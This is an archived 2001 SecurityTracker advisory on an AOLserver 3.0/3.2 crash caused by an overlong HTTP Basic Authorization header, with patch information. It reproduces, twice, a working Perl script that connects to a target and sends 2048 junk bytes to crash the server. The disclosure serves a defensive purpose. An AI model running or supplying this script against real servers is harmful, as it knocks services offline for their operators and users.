SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   AOLserver Vendors:   America Online, Inc.
AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
SecurityTracker Alert ID:  1002267
SecurityTracker URL:  http://securitytracker.com/id/1002267
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 27 2001
Impact:   Denial of service via network
Fix Available:  Yes  Exploit Included:  Yes  
Version(s): 3.0, 3.2
Description:   It is reported that previous versions of AOLserver can be crashed by remote users and may execute arbitrary code [the code execution ability has not been verified] due to improper handling of long authentication data.

In response to a Basic HTTP Authentication resquest, a remote user can send a long authentication string to cause the server to crash.

A demonstration exploit script is provided:

#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;

Impact:   A remote user can cause the server to crash. It has not been confirmed whether this flaw will allow a remote user to cause arbitrary code to be executed.
Solution:   It is reported that AOLserver 3.3.1 and 3.4 are not vulnerable.
Vendor URL:  www.aolserver.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Patch Information) Re: AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
The vendor provides some patch information.
(Exploit Code) Re: AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
A user has provided demonstration exploit code.



 Source Message Contents

Subject:  AOLserver 3.0 vulnerability


Aolserver 3.0 will crash when it is given a long authorization string.  It 
is also possible this vulnerability will allow a hacker to execute 
arbitrary code through a buffer overflow. I have not verified a buffer 
overflow exists.  Aolserver 3.4 and 3.3.1 are not vulnerable to this attack.

Here is a sample exploit:
------------------------------------------
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                 PeerAddr  => $host,
                                 PeerPort  => "http(80)",
                                 );
unless ($remote) { die "cannot connect to http daemon on $host" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;


--------------------
Nate Haggard
SecurityLogics.com 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC